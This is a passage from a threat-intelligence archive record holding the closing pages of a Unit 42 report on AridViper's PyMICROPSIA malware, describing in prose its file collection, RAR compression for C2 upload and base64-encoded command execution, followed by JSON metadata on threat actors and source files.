Retrieval\r\nFile operators have plenty of commands that allow different types of files to be collected from disk. This method\r\nof collection is normally accomplished by selecting the target files and using the legitimate RAR utility to\r\ncompress data that will be uploaded to the C2. The following example shows how the commands focus on specific\r\nextensions:\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 33 of 35\n\nFigure 31. Example of file selection, compression and gathering by extension type.\r\nCommand Execution\r\nThe AridViper operators have the ability to send parameters together with the commands across the C2\r\ninteraction. These commands are split by a specific delimiter ‘;’ in this sample, travelling encoded in base64. The\r\nsample has different options implemented, allowing the operators very flexible execution of commands such as\r\ndownload and execution of payloads from a given URL, process execution, etc.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 34 of 35\n\nFigure 32. URL download and process execution examples.\r\nSource: https://unit42.paloaltonetworks.com/pymicropsia/\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 35 of 35",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/pymicropsia/"
	],
	"report_names": [
		"pymicropsia"
	],
	"threat_actors": [
		{
			"id": "9198aefa-3da6-4605-bb52-923df20a7fce",
			"created_at": "2023-01-06T13:46:38.766848Z",
			"updated_at": "2026-04-10T02:00:03.093153Z",
			"deleted_at": null,
			"main_name": "The Big Bang",
			"aliases": [],
			"source_name": "MISPGALAXY:The Big Bang",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "929d794b-0e1d-4d10-93a6-29408a527cc2",
			"created_at": "2023-01-06T13:46:38.70844Z",
			"updated_at": "2026-04-10T02:00:03.075002Z",
			"deleted_at": null,
			"main_name": "AridViper",
			"aliases": [
				"Desert Falcon",
				"Arid Viper",
				"APT-C-23",
				"Bearded Barbie",
				"Two-tailed Scorpion"
			],
			"source_name": "MISPGALAXY:AridViper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f7d9b02d-d294-422b-adf7-4b3adfac9d9a",
			"created_at": "2022-10-25T16:07:23.392241Z",
			"updated_at": "2026-04-10T02:00:04.577887Z",
			"deleted_at": null,
			"main_name": "The Big Bang",
			"aliases": [],
			"source_name": "ETDA:The Big Bang",
			"tools": [
				"Micropsia"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434374,
	"ts_updated_at": 1775792036,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0ac687364c7a585bd646624aba51f26db3e8042e.pdf",
		"text": "https://archive.orkl.eu/0ac687364c7a585bd646624aba51f26db3e8042e.txt",
		"img": "https://archive.orkl.eu/0ac687364c7a585bd646624aba51f26db3e8042e.jpg"
	}
}